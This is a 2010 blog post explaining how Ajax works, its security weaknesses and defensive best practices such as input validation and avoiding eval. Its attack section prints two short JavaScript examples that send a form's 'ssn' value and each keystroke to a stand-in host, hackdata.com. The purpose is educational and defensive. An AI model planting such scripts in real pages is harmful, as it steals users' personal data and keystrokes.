Sunday, September 05, 2010

Ajax and Web Application Security

Now a days, Ajax, meant for increase interactivity, application speed and usability; popularity becomes increasing because it internally uses "JavaScript" language which has a rich user
interface capability like dynamic form and its properties, pop-up controls, controls on information display, browser properties etc.

Ajax uses different web technologies like:
  • HTML or XHTML: It provide standards for displaying content display
  • Cascading Style Sheet (CSS): It also provide standards for displaying content display
  • JavaScript: It is a scripting language used for client side browser based applications
  • Document Object Model (DOM): It is a standard object model used for displaying dynamic content and related interaction.
  • XML and XSLT: It has a capability to manipulate, exchange and transferred data between client and server.
  • XML HTML Request (XMLHttpRequest): This client side JavaScript API used for HTTP connect to server and exchange information. Information can be plain text, XML or JSON.
  • JavaScript Object Notation (JSON): It is a lightweight, text-based and language independent data exchange format between client and server.
How its Works
Below figure shows the flow of AJAX request:


  • User generates an event or some asynchronous event fire at client end and result a JavaScript call
  • XMLHttpRequest JavaScript object request is created and configured with a request parameter along with event component identifier and user defined values (if any).
  • Above object makes a asynchronous call to web / application server. Call may be web-service, servlet, JSF's AJAX component etc.
  • Based on request, server may fetch the desired data from data store.
  • That data push back to client browser in form of plain text, XML or JSON.
  • XMLHttpRequest callback method received the data, processes it and updated the HTTP DOM representing the web-page with new information.
AJAX Security and Vulnerabilities
As AJAX has good UI (usability) capabilities but it has some security holes which makes web application vulnerable. Vulnerability can be at sever side and client side. As information flow between server and client in form of plain text, XML or JSON which eventually exposing server-side APIs and if insufficient security at server-side leads to unauthenticated access of system. Also usage of AJAX increases the chance of session management vulnerabilities and risk of access hidden URLs which are necessary for AJAX request to be processes.
Another issue with AJAX is visible data. XMLHttpRequest sends the plain visible text to server and may easily reveal database fields like Product Id, Customer Id which can be easily be manipulated by the hacker.

a.Effects of Attack:
  • Hacking Password and Cookies: Hacker can easily manipulate the sensitive information like password, cookies etc by injecting scripts in any part of DOM tree like:
function hackdata() {
var data = document.getElementById("ssn").value;
document.image[0].src = "http://hackdata.com/hackdata=" + data;
}
document.getElementById("button").onclick = hackdata;

Above example shows how hacker can steal the sensitive information.As soon as user clicks on submit button, a asynchronous request goes to hacker site with sensitive information. With the same approach, hacker can hack the cookies information.
  • Hacking keyboard events: Through key logger or mouse sniffer sensitive information can be captured like:
function hackdata(e) {
document.image[0].src = "http://hackdata.com/keydata=" + e.keyCode;
}
document.body.addEventListener("keyup",hackdata,false);

Same way, mouse event can be steal through mouse sniffer.

  • Inserting information: Attacker can modify the stylesheet to eliminate sensitive information such as making font color to white.
b.Best Practices:
Following are the best practices which need to be follow in AJAX based web application:

  • Data Validation: To avoid XSS (Cross Site Scripting), web application must do the input data validation. Input validation and filter out possible active and malicious content from untrusted input source.
  • Avoid Dynamic code generation & execution: Try to avoid dynamic code generation such as usage of eval method
  • Secure use of JSON: As JSON is subset of JavaScript so it may contain malicious code such as many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that use the regular expression defined in RFC 4627 to make sure that JSON doesn't have malicious code.
  • Use if "iFrame": Load the different domain data into iframe, which gives the advantage of JavaScript execution context & DOM tree its own. This prevents hacker from hacking from main page.
  • Use security testing tool: Always use vulnerability checking tool to detect the potential vulnerabilities in advance.
Above are few best practices which needs to follow to avoid from common AJAX attacks.

2 comments:

Arulkumaran.K said...

You have a nice blog. Keep up the good work.

gaurav sharma said...

Hey Gaurav, Really nice blogs.